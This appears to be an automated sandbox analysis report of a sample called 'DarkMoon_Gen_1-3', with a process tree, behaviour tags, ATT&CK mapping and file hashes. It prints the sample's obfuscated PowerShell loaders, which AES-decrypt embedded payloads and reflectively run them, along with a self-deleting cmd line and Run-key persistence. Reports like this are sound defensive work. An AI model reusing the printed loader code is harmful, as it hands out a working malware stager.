[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs);$MJSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3VJkIni/eEgLNMCmmbuF+9uJHd2ZxHH9BvEMmnfuAs4=');$MJSJO = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MJSJO, 0, $MJSJO.Length);$MJSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MJSJO);$eldAL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MUqFa/ybH7fq9E8cDwzQqA==');$eldAL = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eldAL, 0, $eldAL.Length);$eldAL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eldAL);$JmtWK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RNiqtzRUbqzid5tIIG0tdSQQSCND4N3Fip71HpyVpNu/LbAnkQDXvXCNN67DnhoH5Y27G2MJlveDAN7CWQjo2dJc4tmKQnvASHPTcy0RyGxkDhbwoL6OdXRgiYeimaZ3i49J/rxWBNL33jIrXjV6wccc/4aVjVPEYt/lsF5IHcTecs+F97GmTz/xlfrGHuS+klKIHdbsKNtk359gBlEuyIzqc8ZNoXjIsDYcHPmRQW0ppscjiU1/jln8klv2aIxKfUrd3GQUbnHsQMaMF/hqOHe+EY+XH4G0NlTI/p6Gfj6oZBnjn21FQDxykIFEupy9SA9V6u+rIOYPN2aHFGH15vJWjy68WQLa9uRRD0iNI3+fN5lBaMhngNS166V7oDsfk6HFYYqd4SbkPV+So/C260QI7aUZVElJYwH9zWeJN68=');$JmtWK = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JmtWK, 0, $JmtWK.Length);$JmtWK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JmtWK);$sutWG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('721Pgwb2TpdFalOhddbR8A==');$sutWG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sutWG, 0, $sutWG.Length);$sutWG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sutWG);$RmeiH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sYsCTgz2k9CJtXOv5QOESQ==');$RmeiH = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmeiH, 0, $RmeiH.Length);$RmeiH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RmeiH);$yKibX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5yBJCVjGNNI8c4y5TeJZ1g==');$yKibX = 
$MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yKibX, 0, $yKibX.Length);$yKibX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yKibX);$mWhwt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HFsj1rvOoFy/1AQ35wf56A==');$mWhwt = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mWhwt, 0, $mWhwt.Length);$mWhwt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mWhwt);$MQVoG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8OL2bqVmk+GN3goxj/uiw==');$MQVoG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MQVoG, 0, $MQVoG.Length);$MQVoG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MQVoG);$OXRcs0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spJ+lRLXqmjOi3nI0UTS5g==');$OXRcs0 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs0, 0, $OXRcs0.Length);$OXRcs0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs0);$OXRcs1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U4iTk4zuVeeTIShJARv6Pg==');$OXRcs1 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs1, 0, $OXRcs1.Length);$OXRcs1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs1);$OXRcs2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9xaq7OLHlKH+W6faIqwAMw==');$OXRcs2 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs2, 0, $OXRcs2.Length);$OXRcs2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs2);$OXRcs3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JOLtcnTz9Wy99GrNQ2MuMQ==');$OXRcs3 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs3, 0, $OXRcs3.Length);$OXRcs3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs3);$MfWDX.Dispose();$AFKcp1.Dispose();if (@(get-process -ea silentlycontinue $OXRcs3).count -gt 1) {exit};$lJYQx = 
[Microsoft.Win32.Registry]::$mWhwt.$yKibX($OXRcs).$RmeiH($MJSJO);$mFwmU=[string[]]$lJYQx.Split('\');$xwjch=nyZgh(cZwGr([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[1])));JitsM $xwjch (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$Alykr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[0]);$AFKcp = New-Object System.Security.Cryptography.AesManaged;$AFKcp.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$Czfqh = $AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')();$Alykr = $Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Alykr, 0, $Alykr.Length);$Czfqh.Dispose();$AFKcp.Dispose();$zAUTt = New-Object System.IO.MemoryStream(, $Alykr);$GiIcD = New-Object System.IO.MemoryStream;$IbKVT = New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::$OXRcs1);$IbKVT.$MQVoG($GiIcD);$IbKVT.Dispose();$zAUTt.Dispose();$GiIcD.Dispose();$Alykr = $GiIcD.ToArray();$hUYCw = $JmtWK | IEX;$hfTYl = $hUYCw::$OXRcs2($Alykr);$vpjLB = $hfTYl.EntryPoint;$vpjLB.$OXRcs0($null, (, [string[]] ($eldAL)))5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{63e95352-5532-4777-8303-3d53f15d13a5}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{1cbe6018-a611-4b9e-af75-46c1900d6ad4}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{ff42ffba-c7df-4638-bd6a-39b33077e05f}5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 4566⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{1d0919ff-34b1-4236-bbfb-d865c5735c02}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{6f6de688-7914-43d8-a4db-a556ae9a9ae7}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{01675c55-0a5e-4376-b04a-d8f2d7810415}5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 4606⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{c5f489c7-a407-4533-969c-b2dd5cba468c}5⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\starter.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K uni.bat3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe"uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function PCvVf($yFrQM){ $KryQB=[System.Security.Cryptography.Aes]::Create(); $KryQB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KryQB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KryQB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWxz9LOIFbVN1/7cN9UWMlncfIJFIhU1cXRWWiP9bXg='); $KryQB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EIdWPSRydSjZkTvenqbEOg=='); $TSyON=$KryQB.CreateDecryptor(); $return_var=$TSyON.TransformFinalBlock($yFrQM, 0, $yFrQM.Length); $TSyON.Dispose(); $KryQB.Dispose(); $return_var;}function DJYpo($yFrQM){ $rdKbv=New-Object System.IO.MemoryStream(,$yFrQM); $nDivC=New-Object System.IO.MemoryStream; $KhHzB=New-Object System.IO.Compression.GZipStream($rdKbv, [IO.Compression.CompressionMode]::Decompress); $KhHzB.CopyTo($nDivC); $KhHzB.Dispose(); $rdKbv.Dispose(); $nDivC.Dispose(); $nDivC.ToArray();}function mCQbd($yFrQM,$cFYDO){ $nHpHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$yFrQM); $KnSYu=$nHpHM.EntryPoint; $KnSYu.Invoke($null, $cFYDO);}$PdisG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat').Split([Environment]::NewLine);foreach ($gyYDO in $PdisG) { if ($gyYDO.StartsWith('SEROXEN')) { $UdMrg=$gyYDO.Substring(7); break; }}$ekLHX=[string[]]$UdMrg.Split('\');$HlrJz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[0])));$ejeLz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[1])));mCQbd $ejeLz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));mCQbd $HlrJz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{3b8f9b8f-fba0-4b2f-9e65-118eecd89145}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{1df7d0a7-c244-428b-a596-5c8ed35cfd0f}5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe" & exit5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\PING.EXEPING localhost -n 86⤵
- Runs ping.exe
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe"6⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe"6⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\main.exemain.exe3⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c "Dark Moon gen.bat"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\chcp.comchcp 650015⤵
-
C:\Windows\system32\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping discord.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.paysafecard.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.amazon.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping play.google.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping store.steampowered.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping netflix.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.spotify.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.xbox.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 15⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.google.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3592 -s 13122⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Enumerates system info in registry
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 3592 -ip 35922⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4200 -ip 42002⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 668 -p 4576 -ip 45762⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 4932 -ip 49322⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Pre-OS Boot (1): Bootkit (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
Defense Evasion
- Modify Registry (1)
- Pre-OS Boot (1): Bootkit (1)
- Hide Artifacts (1): Hidden Files and Directories (1)
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7B0C.tmp.csv (41KB)
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7B2C.tmp.txt (13KB)
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE774.tmp.csvFilesize
41KB
MD5fc14d8263aaf11fcce66a07ca73a1ebc
SHA15386494630809d8b5a3e8292d972130484e6ea31
SHA2561dc54bf84f4163cdf4e365d034eb776a2cbff30a657f04fbc22650eb6cfe842c
SHA51282af53cc0291030e9cbcce127465a5e1a453cf42139cb30121f35bd15c5101bad61fb73c953478e9949df0c8eca68ea46e536df7dbb75b951cb811ba81296778
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE794.tmp.txtFilesize
13KB
MD53f95b8e4a1eb63d1c48a3975a1a023c1
SHA1de3b9bacc6e86891fd2314654f975ff289912103
SHA2568a3ba3bb6ee287c1aa77ae36e9c7f1e9af2cc854b83c9afecc5ee92d0c04402b
SHA51212374424bfa5b05ac01aa64d0a76af1f27903cbf61fb79f7586d99ab5c2e8498ac405f2b8cebf7a7dbd19184708ddffa040d53c6a27b721f020027a23b3b674d
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERECB6.tmp.csvFilesize
41KB
MD5be8f94a4d74d345783c13da84e8f4b69
SHA1f24582a0e117d08afc1d0376e07c9945332ddd62
SHA256cffaf770e403de5ea927646c3a1bc72b8e728b97a73d383268794bd772c5befe
SHA512db5ae78c21929636cd9ea240938741e348251bf44d22e1b15e73500ea1fe653f153afde3f46eeb9adf532cb36f9fbb02dfeec27c8c57d66ce4281e39c21fb695
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERECD6.tmp.txtFilesize
13KB
MD5a49fcbf808fe0121f3fe5aa0a4b802a2
SHA1ba70d6d065b2c5d844b0bfe8ee9a359f63e11189
SHA25694d45198e72878aca2a061d5ec3cb33c89e5de1c204a577e87d86dd40c541f20
SHA512bbf8e254094bd4a614f7f98800d7b49e85f1a88d430cdaa64500b77678dbd4f46578840a1b8eed327279526f32af746db648b49cbe45b569775ad4d37613b81f
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE3E.tmp.csvFilesize
41KB
MD5425702875c1e194947c565cad4fef011
SHA15ad5b892c8fd63bf81d4777e948cb94f8642c8de
SHA256b0e448d6c57b35518134e00204488317f651fd763b6afeef7b03fb1b25dd97e6
SHA5125bf67659e9f4f51ae37215ebbb6f55d50f99e880e95204d60cd0e1248b5cf326f07b2bc75c5bc0fd79541fa16d068a79cfa31a7401dc6065f8339d3048575bed
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE5E.tmp.txtFilesize
13KB
MD54785e29ad93190a53e71793c5ba9e91c
SHA1fd5ec43175765a7dcea2e493dd9e01068625f80f
SHA256fde8d2f4e1b9b00a4e189a536f69566e01bbe8a26664fd8f4d204898bdda7b79
SHA512afe7e9876a62b12de288ec7e4f1d3db023451d380cbb1663275793710df5edaa0c5367b502bbc6a06f39814e40622f1b42164793434aa9a521e1ba9b15a43a43
-
C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dark Moon gen.batFilesize
35KB
MD5c153581143e0b72cecae38a393991a4b
SHA1da43d03b19765594ff124415a060551343823a39
SHA2562fa64c968a0fe02d626a225ecc2e1e4a5185f73d70a0557f32f2bbea76361005
SHA5128c9807f4a3044f49d99e5b1c2a20d112eba61570fa0e725777a3bd84d6a0e7df1c604579863e27c6d0617c2c84fa4ae8c3b7525e37f7e7ee9c6ef26b6c9db40f
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dx4lkurs.dox.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\$sxr-cmd.exeFilesize
